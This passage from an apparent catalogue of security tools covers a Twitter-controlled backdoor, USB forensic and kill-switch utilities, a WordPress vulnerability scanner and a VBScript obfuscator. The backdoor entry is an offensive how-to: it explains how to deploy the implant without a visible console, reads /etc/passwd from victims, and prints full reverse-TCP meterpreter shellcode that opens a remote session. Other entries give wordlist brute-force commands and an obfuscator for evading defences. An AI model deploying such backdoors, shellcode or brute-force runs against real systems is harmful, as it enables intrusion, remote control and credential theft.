million users have installed it successfully and three

generations of Ph.D. students tested their algorithms in the real
world.
Tribler is the first client which continuously improves upon the
aging BitTorrent protocol from 2001 and addresses its flaws.
We expanded it with, amongst others, streaming from magnet
links, keyword search for content, channels and reputationmanagement. All these features are implemented in a
completely distributed manner, not relying on any centralized
component. Still, Tribler manages to remain fully backwards
compatible with BitTorrent.
Work on Tribler has been supported by multiple Internet
research European grants. In total we received 3,538,609 Euro
in funding for our open source self-organising systems
research.
Roughly 10 to 15 scientists and engineers work on it full-time.
Our ambition is to make darknet technology, security and
privacy the default for all Internet users. As of 2013 we have
received code from 46 contributors and 143.705 lines of code.
VISION & MISSION

"Push the boundaries of self-organising systems, robust
reputation systems and craft collaborative systems with millions
of active participants under continuous attack from spammers
and other adversarial entities."
DownloadTribler
TWITTOR - A FULLY FEATURED BACKDOOR THAT USES
TWITTER AS A C&C SERVER
A stealthy Python based backdoor that uses Twitter (Direct

Messages) as a command and control server This project has
been inspired by Gcat which does the same but using a Gmail
account.
Setup
For this to work you need:

A Twitter account ( Use a dedicated account! Do not
use your personal one! )
Register an app on Twitter with Read, write, and direct
messages Access levels.
Install the dependencies:
$ pip install -r requirements.txt
This repo contains two files:

twittor.py which is the client
implant.py the actual backdoor to deploy
In both files, edit the access token part and add the ones that
you previously generated:
CONSUMER_TOKEN =
'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET =
ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET =
USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'
You're probably going to want to compile implant.py into an

executable using Pyinstaller In order to remove the console
when compiling with Pyinstaller, the flags --noconsole -onefile will help. Just saying.
Usage
In order to run the client, launch the script.

$ python twittor.py
You'll then get into an 'interactive' shell which offers few

commands that are:
$ help
refresh - refresh C&C control
list_bots - list active bots
list_commands - list executed commands
!retrieve <jobid> - retrieve jobid command
!cmd <MAC ADDRESS> command - execute the command on
the bot
!shellcode <MAC ADDRESS> shellcode - load and execute
shellcode in memory (Windows only)
help - print this usage
exit - exit the client
$
Once you've deployed the backdoor on a couple of

systems, you can check available clients using the list
command:
$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-withUbuntu-14.04-precise
$
The output is the MAC address which is used to uniquely

identifies the system but also gives you OS information the
implant is running on. In that case a Linux box.
Let's issue a command to an implant:
$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
[+] Sent command "cat /etc/passwd" with jobid: UMW07r2
$
Here we are telling B7:76:1F:0B:50:B7 to execute cat /etc/

passwd , the script then outputs the jobid that we can use to
retrieve the output of that command
Lets get the results!
$ !retrieve UMW07r2
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/

lib/gnats:/bin/sh
(...)
Command to use in that case is !retrieve followed by the

jobid from the command.
Refresh results
In order to retrieve new bots/command outputs but also force
the client to refresh the results, use the refresh command.
$ refresh
[+] Sending command to retrieve alive bots
[+] Sleeping 10 secs to wait for bots
$
This will send a PING request and wait 10 seconds for them to
answer. Direct messages will then be parsed - Bot list will be
refreshed but also the command list, including new command
outputs.
Retrieve previous commands
As I said earlier, (previous) commands will be retrieved from
older direct messages (limit is 200) and you can actually
retrieve/see them by using thelist_commands command
$ list_commands
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$
Running shellcode (Windows hosts)

This option might be handy in order to retrieve a meterpreter
session and this article becomes really useful.
Generate your meterpreter shellcode, like:
# msfvenom -p windows/meterpreter/reverse_tcp
LHOST=10.0.0.1 LPORT=3615 -f python
(...)
Payload size: 299 bytes
buf =
""
buf += "\xfc
\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f
\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c
\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a
\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b
\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b
\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d
\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b
\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b
\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff
\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d
\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff
\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b
\x00"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea
\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a
\x00\x00\x01\x68"
buf += "\x02\x00\x0e\x1f\x89\xe6\x6a
\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e
\x08\x75\xec"
buf += "\xe8\x3f\x00\x00\x00\x6a\x00\x6a
\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b
\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a
\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a
\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7e
\xc3\x01\xc3\x29\xc6"
buf += "\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff
\xd5"
Extract the shellcode and send it to the specified bot using

the !shellcode command!
$ !shellcode 11:22:33:44:55 \xfc
\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)
[+] Sent shellcode with jobid: xdr7mtN
$
Et voil!
msf exploit(handler) > exploit
[*] Started reverse handler on 10.0.0.1:3615
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 10.0.0.99
[*] Meterpreter session 1 opened (10.0.0.1:3615 ->

10.0.0.99:49254) at 2015-09-08 10:19:04 -0400
meterpreter > getuid
Server username: WIN-XXXXXXXXX\PaulSec
Open a beer and enjoy your reverse meterpreter shell.
Download Twittor
USBDEVIEW V2.45 - VIEW ALL INSTALLED/CONNECTED
USB DEVICES ON YOUR SYSTEM
USBDeview is a small utility that lists all USB devices that

currently connected to your computer, as well as all USB
devices that you previously used.
For each USB device, extended information is displayed:
Device name/description, device type, serial number (for mass
storage devices), the date/time that device was added,
VendorID, ProductID, and more...

USBDeview also allows you to uninstall USB devices that you
previously used, disconnect USB devices that are currently
connected to your computer, as well as to disable and enable
USB devices.
You can also use USBDeview on a remote computer, as long
as you login to that computer with admin user.
Using USBDeview
USBDeview doesn't require any installation process or

additional DLL files. Just copy the executable file
(USBDeview.exe) to any folder you like, and run it.
The main window of USBDeview displays all USB devices
installed on your system. You can select one or more items,
and then disconnect (unplug) them , uninstall them, or just save
the information into text/xml/html file.
USBDeview Columns Description
Device Name: Specifies the device name. For some

device, this column may display meaningless name, like
"USB Device". If the device name is meaningless, try to
look at the Description column.
Device Description: The description of the device.
Device Type: The device type, according to USB class
code. For more information about USB classes: USB
Class Codes.
Connected: Specifies whether the device is currently
connected to your computer. If the device is connected,
you can use the 'Disconnect Selected Devices' option (F9)
to disconnect the device.
Safe To Unplug: Specifies whether it's safe to unplug the
device from the USB plug without disconnecting it first. If
the value of this column is false, and you want to unplug

this device, you must first disconnect this device by using
the 'Disconnect Selected Devices' option (F9) of
USBDeview utility, or by using the 'Unplug or Eject
Hardware' utility of Windows operating system.
Drive Letter: Specifies the drive letter of the USB device.
This column is only relevant to USB flash memory devices
and to USB CD/DVD drives. Be aware that USBDeview
cannot detect drive letters of USB hard-disks.
Serial Number: Specifies the serial number of the device.
This column is only relevant to mass storage devices
(flash memory devices, CD/DVD drives, and USB harddisks).
Created Date: Specifies the date/time that the device was
installed. In most cases, this date/time value represents
the time that you first plugged the device to the USB port.
However, be aware that in some circumstances this value
may be wrong. Also, On Windows 7, this value is
initialized with the current date/time on every reboot.
Last Plug/Unplug Date: Specifies the last time that you
plugged/unplugged the device. This date value is lost
when you restart the computer.
VendorID/ProductID: Specifies the VendorID and
ProductID of the device. For unofficial list of VendorID/
ProductID, click here.
USB Class/Subclass/Protocol: Specifies the Class/
Subclass/Protocol of the device according to USB
specifications. For more information about USB classes:
USB Class Codes.
Hub/Port: Specifies the hub number and port number that
the device was plugged into. This value is empty for mass
storage devices.
Notice: According to user reports, On some systems the 'Last
Plug/Unplug Date' and the 'Created Date' values are initialized
after reboot. This means that these columns may display the
reboot time instead of the correct date/time.
DownloadUSBDeview v2.45
USBKILL - ANTI-FORENSIC KILL-SWITCH THAT WAITS
FOR A CHANGE ON YOUR USB PORTS
USBkill is an anti-forensic kill-switch that waits for a change on

your USB ports and then immediately shuts down your
computer.
To run:
sudo python usbkill.py
Why?
Some reasons to use this tool:

In case the police or other thugs come busting in (or steal
your laptop from you when you are at a public library as
happened to Ross). The police commonly uses a "mouse
jiggler"to keep the screensaver and sleep mode from
activating.
You dont want someone retrieve documents (such as
private keys) from your computer or install malware/
backdoors via USB.
You want to improve the security of your (Full Disk
Encrypted) home or corporate server (e.g. Your
Raspberry).
[!] Important: Make sure to use (partial) disk encryption!
Otherwise they will get in anyway.
Tip: Additionally, you may use a cord to attach a USB key to

your wrist. Then insert the key into your computer and start
usbkill. If they steal your computer, the USB will be removed
and the computer shuts down immediately.
Feature List
(version 1.0-rc.2)
Compatible with Linux, *BSD and OS X.
Shutdown the computer when there is USB activity.
Customizable. Define which commands should be
executed just before shut down.
Ability to whitelist a USB device.
Ability to change the check interval (default: 250ms).
Ability to melt the program on shut down.
Works with sleep mode (OS X).
No dependency except srm. sudo apt-get install
secure-delete
Sensible defaults
Supported command line arguments (mainly for devs):
--no-shut-down: Execute all the (destructive) commands

you defined in settings.ini, but dont turn off the computer.
--cs: Copy program folder settings.ini to /etc/usbkill/
settings.ini
DownloadUSBkill
USBTRACKER - SCRIPT TO TRACK USB DEVICES
EVENTS AND ARTIFACTS IN A WINDOWS OS
USBTracker is a quick & dirty coded incident response and

forensics Python script to dump USB related information and
artifacts from a Windows OS (vista and later).
Special recommandations
USBTracker read some protected log files and needs to be run

with administrator permissions. The most simple way to run
USBTracker is to launch a CMD or Powershell console with a
right click "run as administrator" , then execute the script /
exe inside it.
Executable version
If you don't have a python distribution installed on the computer

you want to analyze with USBTracker, you can also download
an .exe "compiled" version with *PyInstaller of the script from
the repository.
Dependencies
USBTracker is developed with Python 2.7 and has not been

tested with other Python versions. It uses the great Python
module Python-evtx of Willi Ballenthin. So, please don't forget
to install it before use USBTracker.
Usage
Help
If you want display help, just use the "-h" flag :

PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -h
USBTracker alpha
2015 - Sysinsider
USBTracker it's a free tool which allow you to extract
some USB artifacts from a Windows OS (Vista and later).
You must execute USBTracker inside a CMD/Powershell
console runnnig with administror privileges to be able to
dump some
log files artifacts.
usage: usbtracker.py [-h] [-u | -uu] [-nh] [-df] [-x]
optional arguments:
-h, --help
-u, --usbstor
Dump USB artifacts from USBSTOR
registry
-uu, --usbstor-verbose
Dump USB detailed artifacts from
USBSTOR registry.
-nh, --no-hardwareid
Hide HardwareID value during a
USBSTOR detailed
artifacts registry dump.
-df, --driver-frameworks
Dump USB artifacts and events
from the Windows
DriverFrameworks Usermode log.
-x, --raw-xml-event
Display event results in raw xml
(with -df option

only).
List known USB storage devices
If you want to list all USB storage devices known by Windows,

use the "-u" flag to get a simple list :
PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -u
USBTracker alpha
2015 - Sysinsider
dump some
USB device(s) known by this computer :
=====================================
CdRom&Ven_HL-DT-ST&Prod_DVDRAM_GP08NU20&Rev_1.00
Disk&Ven_Generic&Prod_STORAGE_DEVICE&Rev_0272
Disk&Ven_Kingston&Prod_DataTraveler_2.0&Rev_1.00
Disk&Ven_WD&Prod_5000AAV_External&Rev_1.65
Disk&Ven_WD&Prod_Elements_10B8&Rev_1012
Disk&Ven_WD&Prod_My_Book_1140&Rev_1012
Other&Ven_WD&Prod_SES_Device&Rev_1012
or the "-uu" flag if you want to get a detailed list :

PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -uu
USBTracker alpha
2015 - Sysinsider
dump some
USB device(s) known by this computer :
=====================================
CdRom&Ven_HL-DT-ST&Prod_DVDRAM_GP08NU20&Rev_1.00
Serial : 00101016400086C55&0
DeviceDesc : @cdrom.inf,%gencdrom_devdesc%;CD-ROM
Drive
Capabilities : 16
HardwareID : [u'USBSTOR\\CdRomHL-DTSTDVDRAM_GP08NU20_1.00', u'USBSTOR\\CdRomHL-DTSTDVDRAM_GP08NU20_', u'USBSTO
R\\CdRomHL-DT-ST', u'USBSTOR\\HL-DT-STDVDRAM_GP08NU20_1',
u'HL-DT-STDVDRAM_GP08NU20_1', u'USBSTOR\\GenCdRom',
u'GenCdRom
']
CompatibleIDs : [u'USBSTOR\\CdRom', u'USBSTOR\

\RAW']
ContainerID : {def10b43-2e59-5e9f-8ca6ffab1cfc9afa}
Service : cdrom
ClassGUID : {4d36e965-e325-11cebfc1-08002be10318}
ConfigFlags : 0
Driver : {4d36e965-e325-11cebfc1-08002be10318}\0001
Class : CDROM
Mfg : @cdrom.inf,%genmanufacturer%;(Standard CDROM drives)
FriendlyName : HL-DT-ST DVDRAM GP08NU20 USB
Device
=========================================================
=============
Disk&Ven_Generic&Prod_STORAGE_DEVICE&Rev_0272
Serial : 000000000272&0
DeviceDesc : @disk.inf,%disk_devdesc%;Disk drive
Capabilities : 16
HardwareID : [u'USBSTOR\
\DiskGeneric_STORAGE_DEVICE__0272', u'USBSTOR\
\DiskGeneric_STORAGE_DEVICE__', u'USBSTOR\
\DiskGeneric_', u'USBSTOR\\Generic_STORAGE_DEVICE__0',
u'Generic_STORAGE_DEVICE__0', u'USBSTOR\\GenDisk',
u'GenDisk']
CompatibleIDs : [u'USBSTOR\\Disk', u'USBSTOR\
\RAW']
ContainerID : {a3ce89cb-5363-54a8-8d4faf2374c200a5}
ConfigFlags : 0
ClassGUID : {4d36e967-e325-11cebfc1-08002be10318}
Driver : {4d36e967-e325-11cebfc1-08002be10318}\0004
Class : DiskDrive
Mfg : @disk.inf,%genmanufacturer%;(Standard disk
drives)
Service : disk
FriendlyName : Generic STORAGE DEVICE USB Device
=========================================================
=============
...
Dumping events and artifacts from Microsoft-WindowsDriverFrameworks-UserMode%4Operational.evtx log file :
To dump all USB related events (currently EventID 2003, 2004,

2005, 2010, 2100, 2102 & 2105) from the Microsoft-WindowsDriverFrameworks-UserMode%4Operational.evtx log file, use
the "-df" flag.
PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -df
USBTracker alpha
2015 - Sysinsider

dump some
USB related event(s) found in the event log :
=============================================
UTC Time : 2015-01-18 20:31:34.138399
EventID : 2003 | Description : UMDFHostDeviceArrivalBegin
| Computer : 37L4247F27-25 | User SID : S-1-5-19 | User :
LocalService
Lifetime : 8c076f4d-6405-4414-a829-ee44a94e3893
WPDBUSENUMROOT\UMB\2&37C186B&0&STORAGE#VOLUME#_??
_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00
#0019B931D970C8C0C5DB00B9&0#
UTC Time : 2015-01-18 20:31:34.138399
EventID : 2010 | Description : UMDFHostDeviceArrivalEnd |
Computer : 37L4247F27-25 | User SID : S-1-5-19 | User :
LocalService
#0019B931D970C8C0C5DB00B9&0#
UTC Time : 2015-01-18 20:31:34.138399
EventID : 2004 | Description : UMDFHostAddDeviceBegin |
Computer : 37L4247F27-25 | User SID : S-1-5-19 | User :

LocalService
#0019B931D970C8C0C5DB00B9&0#
...
To dump the same events in XML format, just add the "-x" flag :
PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -df -x
USBTracker alpha
2015 - Sysinsider
dump some
USB related event(s) found in the event log :
=============================================
<Event xmlns="http://schemas.microsoft.com/win/2004/08/
events/event"><System><Provider Name="Microsoft-WindowsDriverFra
meworks-UserMode" Guid="2e35aaeb-857f-4beba418-2e6c0e54d988"></Provider>
<EventID Qualifiers="">1003</EventID>
<Version>1</Version>
<Level>4</Level>
<Task>17</Task>
<Opcode>1</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2015-01-18 20:31:34.013599"></
TimeCreated>
<EventRecordID>2</EventRecordID>
<Correlation ActivityID="" RelatedActivityID=""></
Correlation>
<Execution ProcessID="836" ThreadID="1488"></Execution>
<Channel>Microsoft-Windows-DriverFrameworks-UserMode/
Operational</Channel>
<Computer>37L4247F27-25</Computer>
<Security UserID="S-1-5-18"></Security>
</System>
<UserData><UMDFDriverManagerHostCreateStart
lifetime="8c076f4d-6405-4414-a829-ee44a94e3893"
xmlns:auto-ns2="http://schem
as.microsoft.com/win/2004/08/events" xmlns="http://
www.microsoft.com/DriverFrameworks/UserMode/
Event"><HostGuid>{193a182
0-d9ac-4997-8c55-be817523f6aa}</HostGuid>
<DeviceInstanceId>WPDBUSENUMROOT.UMB.2&37C186B&
0&STORAGE#VOLUME#_??
_USBSTOR#DISK&VEN_KINGSTON&PROD_D
ATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&amp
;0#</DeviceInstanceId>
</UMDFDriverManagerHostCreateStart>
</UserData>
</Event>
...
Dumping events and artifacts from setupapi.dev.log log file :
To dump all USB devices installation events (generally first use

of devices) from the setupapi.dev.log log file, use the "-sa" flag.
PS C:\XXX\XXX\XXX\XXX> .\usbtracker.py -sa
USBTracker alpha
2015 - Sysinsider
dump some log files artifacts.
>>>
[Setup online Device Install (Hardware initiated) -
usb\vid_0930&pid_6544\0019b931d970c8c0c5db00b9]
>>>
Section start 2015/01/18 21:31:02.314
>>>
storage\volume\_??
_usbstor#disk&ven_kingston&prod_datatraveler_2.0&rev_1.00
#0019b931d970c8c0c5db00b9&0#{53f56307b6bf-11d0-94f2-00a0c91efb8b}]
>>>
Section start 2015/01/18 21:31:28.241
>>>
WpdBusEnumRoot\UMB\2&37c186b&0&STORAGE#VOLUME#_??
#0019B931D970C8C0C5DB00B9&0#]
>>>
Section start 2015/01/18 21:31:30.956
>>>
usb\root_hub20\4&56dcbd&0]
>>>
Section start 2015/01/18 21:31:59.457
>>>
usb\root_hub\4&38d808bf&0]
>>>
Section start 2015/01/18 21:32:28.925
>>>
usb\root_hub\4&fee3d1d&0]
>>>
Section start 2015/01/18 21:32:31.593
>>>
usb\root_hub20\4&3a831ac0&0]
>>>
Section start 2015/01/18 21:32:32.825
>>>
usb\vid_0458&pid_0137\5&1d8fb94c&0&3]
>>>
Section start 2015/01/18 21:32:36.866
>>>
usb\vid_05ac&pid_8242\5&1d8fb94c&0&5]
>>>
Section start 2015/01/18 21:32:47.037
>>>
usb\vid_05ac&pid_8502\8t9a9e8d577k3l00]
>>>
Section start 2015/01/18 21:32:48.160
...
Download USBTracker
USERPROFILESVIEW - VIEW USER PROFILES
INFORMATION ON YOUR WINDOWS
UserProfilesView displays the list of all user profiles that you

currently have in your system. For each user profile, the
following information is displayed: Domain\User Name, Profile
Path, Last Load Time, Registry File Size, User SID, and more.
You can save the profiles list into text/xml/html/csv file.
Versions History
Version 1.10
Added 'Run As Administrator' option (Ctrl+F11)
Added 'Registry Loaded' column (Yes/No), which
specifies whether the Registry key of the user is
loaded into HKEY_USERS key.
Added 'Logon Time' column, which specifies the
logon time of the current logged on user.
UserProfilesView now displays the system users that
it failed to get in previous versions.

Version 1.01 - Added command-line options for sorting.
Version 1.00 - First release.
System Requirements
This utility works with any version of Windows, starting from

Windows 2000, and up to Windows 10.
Using UserProfilesView
UserProfilesView doesn't require any installation process or
executable file - UserProfilesView.exe
After running it, the main window will display the all of all user
profiles. You can select one or more items, and then save the
list into xml/html/csv/xml file.
/stext
<Filena
me>
Save the list of all profiles into a regular text file.
/stab
<Filena
me>
Save the list of all profiles into a tab-delimited

text file.
/
scomm
a
<Filena
me>
Save the list of all profiles into a commadelimited text file.
/
stabula
r
<Filena
me>
Save the list of all profiles into a tabular text file.
/shtml
<Filena
me>
Save the list of all profiles into HTML file

(Horizontal).
/
sverht
ml
<Filena
me>
Save the list of all profiles into HTML file

(Vertical).
/sxml
<Filena
me>
Save the list of all profiles to XML file.
/sort
<colum
n>

column. If you don't specify this option, the list is
sorted according to the last sort that you made
from the user interface. The <column>
the first column, 1 for the second column, and so
on) or the name of the column, like "Profile Path"
and "User Name". You can specify the '~' prefix
character (e.g: "~Last Load Time") if you want to
sort in descending order. You can put multiple /
sort in the command-line if you want to sort by
multiple columns. Examples:
UserProfilesView.exe.exe /shtml "f:\temp
\profiles.html" /sort 2 /sort ~1
UserProfilesView.exe.exe /shtml "f:\temp
\profiles.html" /sort "User Name"
/nosort
When you specify this command-line option, the

list will be saved without any sorting.
DownloadUserProfilesView
VANE - WORDPRESS VULNERABILITY SCANNER (A GPL
FORK OF WPSCAN)
Vane is a GPL fork of the now non-free popular WordPress
vulnerability scanner WPScan.

INSTALL
Prerequisites
Windows not supported
Ruby => 1.9
RubyGems
Git
Installing on Debian/Ubuntu
sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby
libxml2 libxml2-dev libxslt1-dev ruby-dev
git clone https://github.com/delvelabs/vane.git
cd vane
sudo gem install bundler && bundle install --without test
development
Installing on Fedora
sudo yum install libcurl-devel
cd vane
development
Installing on Archlinux
pacman -Sy ruby
pacman -Sy libyaml
cd vane
development
gem install typhoeus
gem install nokogiri
Installing on Mac OS X
cd vane
development
KNOWN ISSUES
Typhoeus segmentation fault

Update cURL to version => 7.21 (may have to install from
source) See http://code.google.com/p/vane/issues/detail?id=81
Proxy not working

Update cURL to version => 7.21.7 (may have to install from
source).
Installation from sources :
Grab the sources from http://curl.haxx.se/download.html
Decompress the archive
Open the folder with the extracted files
Run ./configure
Run make
Run sudo make install
Run sudo ldconfig
cannot load such file -- readline

Run sudo aptitude install libreadline5-dev
libncurses5-dev
Then, open the directory of the readline gem (you have to

locate it)
cd ~/.rvm/src/ruby-1.9.2-p180/ext/readline
ruby extconf.rb
make
make install
See http://vvv.tobiassjosten.net/ruby-on-rails/fixing-readline-forthe-ruby-on-rails-console/ for more details
VANE ARGUMENTS
--update Update to the latest revision
--url | -u The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is
running WordPress.
--enumerate | -e [option(s)] Enumeration. option : u usernames
from id 1 to 10 u[10-20] usernames from id 10 to 20 (you must
write [] chars) p plugins vp only vulnerable plugins ap all plugins
(can take a long time) tt timthumbs t themes vp only vulnerable
themes at all themes (can take a long time) Multiple values are
allowed : '-e tt,p' will enumerate timthumbs and plugins If no
option is supplied, the default is 'vt,tt,u,vp'
--exclude-content-based '' Used with the enumeration option,
will exclude all occurrences based on the regexp or string
supplied You do not need to provide the regexp delimiters, but
you must write the quotes (simple or double)
--config-file | -c Use the specified config file
--follow-redirection If the target url has a redirection, it will be
followed without asking if you wanted to do so or not
--wp-content-dir WPScan try to find the content directory (ie wpcontent) by scanning the index page, however you can
specified it. Subdirectories are allowed
--wp-plugins-dir Same thing than --wp-content-dir but for the
plugins directory. If not supplied, WPScan will use wp-contentdir/plugins. Subdirectories are allowed
--proxy <[protocol://]host:port> Supply a proxy (will override the

one from conf/browser.conf.json). HTTP, SOCKS4 SOCKS4A
and SOCKS5 are supported. If no protocol is given (format
host:port), HTTP will be used
--proxy-auth username:password Supply the proxy login
credentials (will override the one from conf/browser.conf.json).
--basic-auth username:password Set the HTTP Basic
authentication
--wordlist | -w Supply a wordlist for the password bruter and do
the brute.
--threads | -t The number of threads to use when multithreading requests. (will override the value from conf/
browser.conf.json)
--username | -U Only brute force the supplied username.
--help | -h This help screen.
--verbose | -v Verbose output.
VANE EXAMPLES
Do 'non-intrusive' checks...
ruby vane.rb --url www.example.com
Do wordlist password brute force on enumerated users using

50 threads...
ruby vane.rb --url www.example.com --wordlist
darkc0de.lst --threads 50
Do wordlist password brute force on the 'admin' username

only...
ruby vane.rb --url www.example.com --wordlist
darkc0de.lst --username admin
Enumerate installed plugins...

ruby vane.rb --url www.example.com --enumerate p
VANETOOLS ARGUMENTS
--help
| -h
This help screen.
--Verbose | -v
Verbose output.
--update
Update to the latest revision.
| -u
--generate_plugin_list [number of pages]
Generate a new
data/plugins.txt file. (supply number of *pages* to

parse, default : 150)
--gpl
Alias for --generate_plugin_list
--check-local-vulnerable-files | --clvf <local directory>

Perform a recursive scan in the <local directory> to find
vulnerable files or shells
VANETOOLS EXAMPLES
Generate a new 'most popular' plugin list, up to 150 pages ...
ruby vanetools.rb --generate_plugin_list 150
Locally scan a WordPress installation for vulnerable files or

shells :
ruby vanetools.rb --check-local-vulnerable-files /var/
www/wordpress/
DownloadVane
VBS-OBFUSCATOR - VBSCRIPT OBFUSCATION TO
ALLOW PENTESTERS BYPASS COUNTERMEASURES
VBScript obfuscation to allow PenTesters bypass

countermeasures.
Sample Script Output
C:\tools>python obfuscator.py test.vbs out.vbs
Char 109 -> 5505-5396
Char 115 -> 1113775/9685
Char 103 -> 540853/5251
Char 98 -> -2629+2727
Char 111 -> 291-180
Char 120 -> 826320/6886
Char 32 -> 118016/3688
Char 34 -> -2379+2413
Char 72 -> 2401-2329
Char 101 -> -1347+1448
Char 108 -> 759780/7035

Char 108 -> 5391-5283
Char 111 -> 743700/6700
Char 32 -> 7654-7622
Char 87 -> 636927/7321
Char 111 -> -46+157
Char 114 -> 7591-7477
Char 108 -> -9028+9136
Char 100 -> 285800/2858
Char 33 -> 5241-5208
Char 34 -> 7209-7175
Char 44 -> 234080/5320
Char 32 -> 104352/3261
Char 118 -> -3369+3487
Char 98 -> -7575+7673
Char 79 -> -9140+9219
Char 107 -> 4317-4210
Char 79 -> -5433+5512
Char 110 -> -1294+1404
Char 108 -> 6672-6564
Char 121 -> 1109-988
Char 32 -> 166080/5190
Char 43 -> 95675/2225
Char 32 -> 3156-3124
Char 118 -> -9572+9690
Char 98 -> -3093+3191
Char 73 -> 53947/739
Char 110 -> -2239+2349
Char 102 -> 554982/5441
Char 111 -> 4953-4842
Char 114 -> 907440/7960

Char 109 -> 3406-3297
Char 97 -> 3570-3473
Char 116 -> 3624-3508
Char 105 -> 137130/1306
Char 111 -> 632-521
Char 110 -> 8712-8602
Char 44 -> 94468/2147
Char 32 -> 14176/443
Char 34 -> 884/26
Char 84 -> -9768+9852
Char 104 -> -5195+5299
Char 105 -> 706335/6727
Char 115 -> 6469-6354
Char 32 -> 250304/7822
Char 105 -> -9605+9710
Char 115 -> 771190/6706
Char 32 -> -1319+1351
Char 97 -> 674053/6949
Char 32 -> -6907+6939
Char 109 -> 3365-3256
Char 101 -> 170791/1691
Char 115 -> 17020/148
Char 115 -> 3217-3102
Char 97 -> -6948+7045
Char 103 -> -9545+9648
Char 101 -> 9670-9569
Char 98 -> 926002/9449
Char 111 -> 130869/1179
Char 120 -> 255600/2130
Char 34 -> -1384+1418

Char 42 -> 1784-1742
Done!
Results (comparison)
First output
Dim SzVeVmXkoEZx, LALrsGQYjZtj, kLTOaGJfsmSG
SzVeVmXkoEZx =
"6974-6865*602140/5236*45732/444*-8743+8841*8842-8731*517
9-5059*-4646+4678*892-858*5573-5501*129-28*9855-9747*-668
1+6789*-9095+9206*257184/8037*311721/3583*-7211+7322*7416
84/6506*-5620+5728*241300/2413*198-165*-9925+9959*6380-63
36*5552-5520*-9222+9340*569-471*-6484+6563*6988-6881*1285
33/1627*-5150+5260*4828-4720*5616-5495*6062-6030*5407-536
4*313728/9804*-9272+9390*-767+865*3735-3662*-2705+2815*-4
151+4253*73704/664*-9531+9645*-7310+7419*-1882+1979*31713055*9554-9449*2676-2565*-1012+1122*107448/2442*4055-4023
*-6753+6787*2058-1974*-5464+5568*428610/4082*2479-2364*-3
013+3045*-9195+9300*128225/1115*56448/1764*-6899+6996*161
760/5055*253752/2328*756288/7488*-4081+4196*29900/260*-31
64+3261*-6830+6933*-6580+6681*-8764+8862*861360/7760*3308
40/2757*-2407+2441"
LALrsGQYjZtj = Split(SzVeVmXkoEZx,
chr(eval(261366/6223)))
for each SKhxsIKQEybA in LALrsGQYjZtj
